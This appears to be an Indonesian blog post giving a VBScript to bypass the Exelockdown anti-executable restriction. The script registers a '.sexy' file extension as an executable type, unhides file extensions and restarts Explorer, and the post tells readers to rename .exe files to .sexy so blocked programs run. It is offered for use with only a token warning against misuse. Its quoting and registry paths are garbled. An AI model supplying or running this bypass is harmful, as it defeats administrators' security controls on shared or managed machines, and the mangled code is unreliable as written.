const HKEY_CLASSES_ROOT = &H80000000
const HKEY_CURRENT_USER = &H80000001
QUOT = chr(34)
strComputer = “.”
On error resume next
Tanya = MsgBox(”By Pass Exelockdown dengan Registry Shell Spawning”& _
vbNewLine & “Reset Exelockdown?”, 36,”Exelockdown Hacking – by Lovepassword”)
If Tanya = 6 Then ‘Bila dipilih YA
Set objRegistry = GetObject(”winmgmts:{impersonationLevel=impersonate}!\” &strComputer & ” ootdefault:StdRegProv”)
objRegistry.CreateKey HKEY_CLASSES_ROOT, “.sexy”
objRegistry.SetStringValue HKEY_CLASSES_ROOT,”.sexy”,,”exefile”
objRegistry.SetStringValue HKEY_CLASSES_ROOT,”.sexy”,”Content Type”,”application/x-msdownload”
objRegistry.CreateKey HKEY_CLASSES_ROOT, “.sexyPersistentHandler”
objRegistry.SetStringValue HKEY_CLASSES_ROOT,”.sexyPersistentHandler”,,”{098f2470-bae0-11cd-b579-08002b30bfeb}”
objRegistry.CreateKey HKEY_CURRENT_USER, “SoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced”
objRegistry.SetDWORDValue HKEY_CURRENT_USER,”SoftwareMicrosoftWindowsCurrentVersionExplorerAdvanced”,”HideFileExt”,0
Set objWMIService = GetObject(”winmgmts:” _
& “{impersonationLevel=impersonate}!\” & strComputer & ” ootcimv2?)
Set colProcessList = objWMIService.ExecQuery _
(”SELECT * FROM Win32_Process WHERE Name = ‘explorer.exe’”)
For Each objProcess in colProcessList
objProcess.Terminate()
Next
set objShell = createobject(”Wscript.Shell”)
objShell.Run “explorer.exe”
msgbox “Copi file exe, rename menjadi file sexy, lalu jalankan”,vbInformation,”Exelockdown Hacking – by 060183”
End If
Silakan copy paste di notepad lalu pilih all files dan simpan dengan extensi .vbs.. jalankan…
Kemudian ubah extensi file .exe jadi .sexy Maka anda selamat dari pencekalan software anti executable. Ingat jangan disalah gunakan OK
Tidak ada komentar:
Posting Komentar